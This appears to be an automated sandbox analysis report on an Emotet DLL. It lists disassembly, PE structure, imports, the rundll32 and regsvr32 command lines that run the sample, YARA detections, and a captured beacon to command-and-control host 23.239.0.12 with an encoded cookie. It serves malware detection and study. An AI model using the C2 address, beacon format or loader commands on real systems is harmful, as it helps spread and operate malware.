                                                                  int3
                                                                  int3
                                                                  dec eax
                                                                  mov dword ptr [esp+08h], ecx
                                                                  dec eax
                                                                  sub esp, 00000088h
                                                                  dec eax
                                                                  lea ecx, dword ptr [00014D05h]
                                                                  call dword ptr [0000FC7Fh]
                                                                  dec esp
                                                                  mov ebx, dword ptr [00014DF0h]
                                                                  dec esp
                                                                  mov dword ptr [esp+58h], ebx
                                                                  inc ebp
                                                                  xor eax, eax
                                                                  dec eax
                                                                  lea edx, dword ptr [esp+60h]
                                                                  dec eax
                                                                  mov ecx, dword ptr [esp+58h]
                                                                  call 00007F9804DCDA6Ah
                                                                  dec eax
                                                                  mov dword ptr [esp+50h], eax
                                                                  dec eax
                                                                  cmp dword ptr [esp+50h], 00000000h
                                                                  je 00007F9804DBEF23h
                                                                  dec eax
                                                                  mov dword ptr [esp+38h], 00000000h
                                                                  dec eax
                                                                  lea eax, dword ptr [esp+48h]
                                                                  dec eax
                                                                  mov dword ptr [esp+30h], eax
                                                                  dec eax
                                                                  lea eax, dword ptr [esp+40h]
                                                                  dec eax
                                                                  mov dword ptr [esp+28h], eax
                                                                  dec eax
                                                                  lea eax, dword ptr [00014CB0h]
                                                                  dec eax
                                                                  mov dword ptr [esp+20h], eax
                                                                  dec esp
                                                                  mov ecx, dword ptr [esp+50h]
                                                                  dec esp
                                                                  mov eax, dword ptr [esp+58h]
                                                                  dec eax
                                                                  mov edx, dword ptr [esp+60h]
                                                                  xor ecx, ecx
                                                                  call 00007F9804DCDA18h
                                                                  jmp 00007F9804DBEF04h
                                                                  dec eax
                                                                  mov eax, dword ptr [eax+eax+00000000h]
                                                                  Programming Language:
                                                                  • [ C ] VS2008 build 21022
                                                                  • [LNK] VS2008 build 21022
                                                                  • [ASM] VS2008 build 21022
                                                                  • [IMP] VS2005 build 50727
                                                                  • [RES] VS2008 build 21022
                                                                  • [EXP] VS2008 build 21022
                                                                  • [C++] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x55cf0 | 0x6f | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5544c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5a000 | 0x2dffc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x59000 | 0xe1c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x88000 | 0x1d8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x52000 | 0x288 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x504ca | 0x50600 | False | 0.389081940124 | zlib compressed data | 5.26882252971 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x52000 | 0x3d5f | 0x3e00 | False | 0.355342741935 | data | 5.39270768906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x56000 | 0x20d8 | 0x1200 | False | 0.180772569444 | data | 2.18161586025 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata | 0x59000 | 0xe1c | 0x1000 | False | 0.44580078125 | data | 4.98556265168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x5a000 | 0x2dffc | 0x2e000 | False | 0.839408542799 | data | 7.73448363752 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x88000 | 0x6f8 | 0x800 | False | 0.1796875 | data | 1.81179169858 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_RCDATA | 0x5a0a0 | 0x2de00 | data | English | United States
RT_MANIFEST | 0x87ea0 | 0x15a | ASCII text, with CRLF line terminators | English | United States
DLL | Import
KERNEL32.dll | ExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA
ole32.dll | CoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc
Name | Ordinal | Address
DllRegisterServer | 1 | 0x180042050
DllUnregisterServer | 2 | 0x180042080
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 14, 2022 04:46:01.021106958 CEST | 49789 | 443 | 192.168.2.7 | 23.239.0.12
May 14, 2022 04:46:01.021159887 CEST | 443 | 49789 | 23.239.0.12 | 192.168.2.7
May 14, 2022 04:46:01.021250010 CEST | 49789 | 443 | 192.168.2.7 | 23.239.0.12
May 14, 2022 04:46:01.047135115 CEST | 49789 | 443 | 192.168.2.7 | 23.239.0.12
May 14, 2022 04:46:01.047177076 CEST | 443 | 49789 | 23.239.0.12 | 192.168.2.7
May 14, 2022 04:46:01.595927000 CEST | 443 | 49789 | 23.239.0.12 | 192.168.2.7
May 14, 2022 04:46:01.596092939 CEST | 49789 | 443 | 192.168.2.7 | 23.239.0.12
May 14, 2022 04:46:01.937185049 CEST | 49789 | 443 | 192.168.2.7 | 23.239.0.12
May 14, 2022 04:46:01.937206984 CEST | 443 | 49789 | 23.239.0.12 | 192.168.2.7
May 14, 2022 04:46:01.937649012 CEST | 443 | 49789 | 23.239.0.12 | 192.168.2.7
May 14, 2022 04:46:01.937730074 CEST | 49789 | 443 | 192.168.2.7 | 23.239.0.12
May 14, 2022 04:46:01.940763950 CEST | 49789 | 443 | 192.168.2.7 | 23.239.0.12
May 14, 2022 04:46:01.984502077 CEST | 443 | 49789 | 23.239.0.12 | 192.168.2.7
May 14, 2022 04:46:02.795677900 CEST | 443 | 49789 | 23.239.0.12 | 192.168.2.7
May 14, 2022 04:46:02.795754910 CEST | 443 | 49789 | 23.239.0.12 | 192.168.2.7
May 14, 2022 04:46:02.795877934 CEST | 49789 | 443 | 192.168.2.7 | 23.239.0.12
May 14, 2022 04:46:02.796772957 CEST | 49789 | 443 | 192.168.2.7 | 23.239.0.12
May 14, 2022 04:46:02.796799898 CEST | 443 | 49789 | 23.239.0.12 | 192.168.2.7
                                                                  • 23.239.0.12
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49789 | 23.239.0.12 | 443 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-14 02:46:01 UTC | 0 | OUT | GET / HTTP/1.1
                                                                  Cookie: QDGlPmKOb=TX/dVeT7lyH5ngHmnxMFxqFeFIckgyS+eTvFxPj70GF45WQbYgIR5YD52OsRDc9blkyjiUa0Yqe6pSbgy2DVASEEWQlhPFUSnkyvs1j9fcs/03LtUxyEgokNnTm9BdbgUKLysz+GIHunJ3ICf+MbOMPcxyDQMEPxDtn7pCNcxuY2bJ346K6C6yeS1bR8Vwv7L6AvzN/6XVrUEvcLceWiPnN+L5HntiDuAJ2t3QmxGdGoD743iGvw+oldDKvtdideoP8CRqfM0HELQHL9xZ/PA34HGO1+ThmvKp607np2POFA3Gk1Jr7OalPDwf6Z5NEvJ+AZRsVDKA==
                                                                  Host: 23.239.0.12
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
2022-05-14 02:46:02 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Sat, 14 May 2022 02:46:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
2022-05-14 02:46:02 UTC | 0 | IN | Data Raw: 32 65 62 0d 0a e1 03 3b 6b 60 0b 5e c5 dc c0 8a ce a3 4d 5b 5e ce 09 61 13 f3 35 44 5f c3 47 23 36 69 ed 57 e1 9d 51 9b 58 99 11 86 a8 f4 08 c9 33 21 04 07 b2 ee 71 3d 07 90 97 02 46 7d 72 75 fc ae 0a 68 d5 70 6f 64 72 17 6d 53 b9 ff 08 06 40 45 d5 69 01 12 bc fe f8 d0 f4 9e ef f9 ec 4e aa 7c e5 7b ef 67 3e 10 4b 6e 73 de bb 00 62 47 7b c1 e2 e2 ec 4a af 60 a4 09 ee ae 97 38 62 2c b3 9a 09 8b 4e 9d 2d 7b 77 11 c7 02 47 7a ba 4d 68 42 81 8b cf 76 34 a9 76 42 e6 09 3a 52 a0 08 a4 5d fa 06 c3 2b 25 a7 14 2e 25 45 18 8a b7 98 b0 43 20 7b 80 d8 dc 6d 78 01 08 1b df fb c5 b3 24 90 ed 91 57 4f a4 a1 f1 11 c3 ad 11 02 a9 32 63 ca 83 6e ad 26 45 c3 65 1a 21 c0 49 4f 2b b2 b7 04 35 dd fb 28 98 85 3c d8 89 6d 28 e7 8a dc 8d 27 e6 a9 cb fb 74 98 08 7f a5 ca e5 52 36
                                                                  Data Ascii: 2eb;k`^M[^a5D_G#6iWQX3!q=F}ruhpodrmS@EiN|{g>KnsbG{J`8b,N-{wGzMhBv4vB:R]+%.%EC {mx$WO2cn&Ee!IO+5(<m('tR6


                                                                  Target ID:0
                                                                  Start time:04:45:22
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\loaddll64.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:loaddll64.exe "C:\Users\user\Desktop\x4ByCNJqst.dll"
                                                                  Imagebase:0x7ff7d85f0000
                                                                  File size:140288 bytes
                                                                  MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:1
                                                                  Start time:04:45:23
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1
                                                                  Imagebase:0x7ff6a6590000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:2
                                                                  Start time:04:45:23
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\x4ByCNJqst.dll
                                                                  Imagebase:0x7ff74df50000
                                                                  File size:24064 bytes
                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.358233793.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:3
                                                                  Start time:04:45:23
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1
                                                                  Imagebase:0x7ff7c98c0000
                                                                  File size:69632 bytes
                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.356219703.0000017092640000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:4
                                                                  Start time:04:45:24
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllRegisterServer
                                                                  Imagebase:0x7ff7c98c0000
                                                                  File size:69632 bytes
                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.356042845.000001A5A5EA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:5
                                                                  Start time:04:45:28
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllUnregisterServer
                                                                  Imagebase:0x7ff7c98c0000
                                                                  File size:69632 bytes
                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:6
                                                                  Start time:04:45:28
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZqFjKrAb\CiXiSWjn.dll"
                                                                  Imagebase:0x7ff74df50000
                                                                  File size:24064 bytes
                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.743858456.0000000000F20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:7
                                                                  Start time:04:45:36
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff7e8070000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:11
                                                                  Start time:04:46:03
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                  Imagebase:0x7ff7e8070000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:13
                                                                  Start time:04:46:10
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff7e8070000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  Target ID:14
                                                                  Start time:04:46:31
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff7e8070000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  Target ID:16
                                                                  Start time:04:46:44
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                  Imagebase:0x7ff7e8070000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  Target ID:28
                                                                  Start time:04:47:54
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                  Imagebase:0x7ff7e8070000
                                                                  File size:51288 bytes
                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                    Execution Graph

                                                                    Execution Coverage:10.7%
                                                                    Dynamic/Decrypted Code Coverage:2.5%
                                                                    Signature Coverage:16.1%
                                                                    Total number of Nodes:685
                                                                    Total number of Limit Nodes:6
                                                                    execution_graph 9735 7ff8ca9b2290 9737 7ff8ca9b22b6 9735->9737 9738 7ff8ca9b22f3 9737->9738 9744 7ff8ca9b22be 9737->9744 9747 7ff8ca9b2154 9737->9747 9738->9744 9789 7ff8ca971230 9738->9789 9741 7ff8ca9b2335 9742 7ff8ca9b2154 126 API calls 9741->9742 9741->9744 9742->9744 9743 7ff8ca971230 8 API calls 9745 7ff8ca9b2328 9743->9745 9746 7ff8ca9b2154 126 API calls 9745->9746 9746->9741 9748 7ff8ca9b2162 9747->9748 9749 7ff8ca9b21e1 9747->9749 9794 7ff8ca9b4110 HeapCreate 9748->9794 9751 7ff8ca9b221e 9749->9751 9758 7ff8ca9b21e5 9749->9758 9752 7ff8ca9b2223 9751->9752 9753 7ff8ca9b2279 9751->9753 9887 7ff8ca9b3108 9752->9887 9755 7ff8ca9b216d 9753->9755 9914 7ff8ca9b2f50 9753->9914 9755->9738 9758->9755 9761 7ff8ca9b3a48 46 API calls 9758->9761 9760 7ff8ca9b2179 _RTC_Initialize 9763 7ff8ca9b217d 9760->9763 9769 7ff8ca9b2189 GetCommandLineA 9760->9769 9764 7ff8ca9b2212 9761->9764 9892 7ff8ca9b415c HeapDestroy 9763->9892 9767 7ff8ca9b2c94 48 API calls 9764->9767 9765 7ff8ca9b2243 FlsSetValue 9770 7ff8ca9b2259 9765->9770 9771 7ff8ca9b226f 9765->9771 9768 7ff8ca9b2217 9767->9768 9898 7ff8ca9b415c HeapDestroy 9768->9898 9813 7ff8ca9b3eec 9769->9813 9899 7ff8ca9b2cbc 9770->9899 9908 7ff8ca9b3024 9771->9908 9780 7ff8ca9b21ab 9851 7ff8ca9b2c94 9780->9851 9783 7ff8ca9b21b7 9784 7ff8ca9b21cb 9783->9784 9866 7ff8ca9b3aec 9783->9866 9784->9755 9893 7ff8ca9b3a48 9784->9893 9790 7ff8ca971249 wcsftime 9789->9790 9791 7ff8ca971276 9790->9791 9792 7ff8ca9b20e0 __initmbctable 8 API calls 9791->9792 9793 7ff8ca9b203e 9792->9793 9793->9741 9793->9743 9795 7ff8ca9b2169 9794->9795 9796 7ff8ca9b4134 HeapSetInformation 9794->9796 9795->9755 9797 7ff8ca9b2fa0 9795->9797 9796->9795 9920 7ff8ca9b36f0 9797->9920 9799 7ff8ca9b2fab 9925 7ff8ca9b6970 9799->9925 9802 7ff8ca9b3014 9804 7ff8ca9b2c94 48 API calls 9802->9804 9803 7ff8ca9b2fb4 FlsAlloc 9803->9802 9805 7ff8ca9b2fcc 9803->9805 9806 7ff8ca9b3019 9804->9806 9807 7ff8ca9b3108 
__wtomb_environ 45 API calls 9805->9807 9806->9760 9808 7ff8ca9b2fdb 9807->9808 9808->9802 9809 7ff8ca9b2fe3 FlsSetValue 9808->9809 9809->9802 9810 7ff8ca9b2ff6 9809->9810 9811 7ff8ca9b2cbc _set_doserrno 45 API calls 9810->9811 9812 7ff8ca9b3000 GetCurrentThreadId 9811->9812 9812->9806 9814 7ff8ca9b3f1b GetEnvironmentStringsW 9813->9814 9815 7ff8ca9b3f4d 9813->9815 9816 7ff8ca9b3f35 GetLastError 9814->9816 9817 7ff8ca9b3f29 9814->9817 9815->9817 9818 7ff8ca9b4010 9815->9818 9816->9815 9820 7ff8ca9b3f70 WideCharToMultiByte 9817->9820 9821 7ff8ca9b3f5b GetEnvironmentStringsW 9817->9821 9819 7ff8ca9b401d GetEnvironmentStrings 9818->9819 9822 7ff8ca9b219b 9818->9822 9819->9822 9823 7ff8ca9b402f 9819->9823 9825 7ff8ca9b3fbe 9820->9825 9826 7ff8ca9b3fff 9820->9826 9821->9820 9821->9822 9838 7ff8ca9b3758 GetStartupInfoA 9822->9838 9828 7ff8ca9b309c __setargv 45 API calls 9823->9828 9932 7ff8ca9b309c 9825->9932 9827 7ff8ca9b4002 FreeEnvironmentStringsW 9826->9827 9827->9822 9830 7ff8ca9b4053 9828->9830 9832 7ff8ca9b405b FreeEnvironmentStringsA 9830->9832 9833 7ff8ca9b4069 __initmbctable 9830->9833 9832->9822 9836 7ff8ca9b4077 FreeEnvironmentStringsA 9833->9836 9834 7ff8ca9b3fce WideCharToMultiByte 9834->9827 9835 7ff8ca9b3ff7 9834->9835 9837 7ff8ca9b3024 free 45 API calls 9835->9837 9836->9822 9837->9826 9839 7ff8ca9b3108 __wtomb_environ 45 API calls 9838->9839 9840 7ff8ca9b3795 9839->9840 9842 7ff8ca9b395b 9840->9842 9843 7ff8ca9b3108 __wtomb_environ 45 API calls 9840->9843 9849 7ff8ca9b21a7 9840->9849 9850 7ff8ca9b38c4 9840->9850 9841 7ff8ca9b3981 GetStdHandle 9841->9842 9842->9841 9844 7ff8ca9b39b0 GetFileType 9842->9844 9845 7ff8ca9b3a10 SetHandleCount 9842->9845 9847 7ff8ca9b7ee4 _lock InitializeCriticalSectionAndSpinCount 9842->9847 9842->9849 9843->9840 9844->9842 9845->9849 9846 7ff8ca9b38f7 GetFileType 9846->9850 9847->9842 9848 7ff8ca9b7ee4 _lock InitializeCriticalSectionAndSpinCount 9848->9850 9849->9780 9859 7ff8ca9b3df4 9849->9859 9850->9842 9850->9846 
9850->9848 9850->9849 9852 7ff8ca9b2ca3 FlsFree 9851->9852 9853 7ff8ca9b2cb0 9851->9853 9852->9853 9854 7ff8ca9b6a2f DeleteCriticalSection 9853->9854 9855 7ff8ca9b6a4d 9853->9855 9856 7ff8ca9b3024 free 45 API calls 9854->9856 9857 7ff8ca9b6a5b DeleteCriticalSection 9855->9857 9858 7ff8ca9b6a6a 9855->9858 9856->9853 9857->9855 9858->9763 9860 7ff8ca9b3e11 GetModuleFileNameA 9859->9860 9861 7ff8ca9b3e0c 9859->9861 9863 7ff8ca9b3e43 __setargv 9860->9863 10078 7ff8ca9b4ecc 9861->10078 9864 7ff8ca9b309c __setargv 45 API calls 9863->9864 9865 7ff8ca9b3e97 __setargv 9863->9865 9864->9865 9865->9783 9867 7ff8ca9b3b09 9866->9867 9869 7ff8ca9b3b0e __tzset 9866->9869 9868 7ff8ca9b4ecc __initmbctable 83 API calls 9867->9868 9868->9869 9870 7ff8ca9b3108 __wtomb_environ 45 API calls 9869->9870 9874 7ff8ca9b21c0 9869->9874 9873 7ff8ca9b3b4d __tzset 9870->9873 9871 7ff8ca9b3bc6 9872 7ff8ca9b3024 free 45 API calls 9871->9872 9872->9874 9873->9871 9873->9874 9875 7ff8ca9b3108 __wtomb_environ 45 API calls 9873->9875 9876 7ff8ca9b3c02 9873->9876 9877 7ff8ca9b7fbc __tzset 45 API calls 9873->9877 9879 7ff8ca9b3ba2 9873->9879 9874->9784 9881 7ff8ca9b347c 9874->9881 9875->9873 9878 7ff8ca9b3024 free 45 API calls 9876->9878 9877->9873 9878->9874 9880 7ff8ca9b6550 __tzset 6 API calls 9879->9880 9880->9873 9882 7ff8ca9b3492 _cinit 9881->9882 10482 7ff8ca9b73f4 9882->10482 9884 7ff8ca9b34af _initterm_e 9886 7ff8ca9b34d2 _cinit 9884->9886 10485 7ff8ca9b73dc 9884->10485 9886->9784 9888 7ff8ca9b312d 9887->9888 9890 7ff8ca9b2237 9888->9890 9891 7ff8ca9b314b Sleep 9888->9891 10502 7ff8ca9b6cec 9888->10502 9890->9755 9890->9765 9891->9888 9891->9890 9892->9755 9895 7ff8ca9b3a59 9893->9895 9894 7ff8ca9b3aa8 9894->9780 9895->9894 9896 7ff8ca9b3a70 DeleteCriticalSection 9895->9896 9897 7ff8ca9b3024 free 45 API calls 9895->9897 9896->9895 9897->9895 9898->9755 9900 7ff8ca9b6ba0 _lock 45 API calls 9899->9900 9901 7ff8ca9b2d11 9900->9901 10511 7ff8ca9b6a80 LeaveCriticalSection 9901->10511 9909 
7ff8ca9b3029 HeapFree 9908->9909 9913 7ff8ca9b3059 free 9908->9913 9910 7ff8ca9b3044 9909->9910 9909->9913 9911 7ff8ca9b67e0 _errno 43 API calls 9910->9911 9912 7ff8ca9b3049 GetLastError 9911->9912 9912->9913 9913->9755 9915 7ff8ca9b2f64 9914->9915 9916 7ff8ca9b2f88 9914->9916 9917 7ff8ca9b2f78 FlsSetValue 9915->9917 9918 7ff8ca9b2f69 FlsGetValue 9915->9918 9916->9755 10512 7ff8ca9b2e18 9917->10512 9918->9917 9929 7ff8ca9b2c5c EncodePointer 9920->9929 9922 7ff8ca9b36fb _initp_misc_winsig 9923 7ff8ca9b755c EncodePointer 9922->9923 9924 7ff8ca9b373e EncodePointer 9923->9924 9924->9799 9926 7ff8ca9b6993 9925->9926 9928 7ff8ca9b2fb0 9926->9928 9930 7ff8ca9b7ee4 InitializeCriticalSectionAndSpinCount 9926->9930 9928->9802 9928->9803 9931 7ff8ca9b7f11 9930->9931 9931->9926 9933 7ff8ca9b30b8 9932->9933 9935 7ff8ca9b30f0 9933->9935 9936 7ff8ca9b30d0 Sleep 9933->9936 9937 7ff8ca9b6c34 9933->9937 9935->9826 9935->9834 9936->9933 9936->9935 9938 7ff8ca9b6cc8 realloc 9937->9938 9946 7ff8ca9b6c4c realloc 9937->9946 9940 7ff8ca9b67e0 _errno 44 API calls 9938->9940 9939 7ff8ca9b6c84 RtlAllocateHeap 9941 7ff8ca9b6cbd 9939->9941 9939->9946 9940->9941 9941->9933 9943 7ff8ca9b6cad 9996 7ff8ca9b67e0 9943->9996 9946->9939 9946->9943 9947 7ff8ca9b6cb2 9946->9947 9948 7ff8ca9b6c64 9946->9948 9950 7ff8ca9b67e0 _errno 44 API calls 9947->9950 9948->9939 9951 7ff8ca9b7160 9948->9951 9960 7ff8ca9b6f0c 9948->9960 9993 7ff8ca9b334c 9948->9993 9950->9941 9999 7ff8ca9bd2ac 9951->9999 9954 7ff8ca9b717d 9956 7ff8ca9b6f0c _FF_MSGBANNER 45 API calls 9954->9956 9958 7ff8ca9b719e 9954->9958 9955 7ff8ca9bd2ac _FF_MSGBANNER 45 API calls 9955->9954 9957 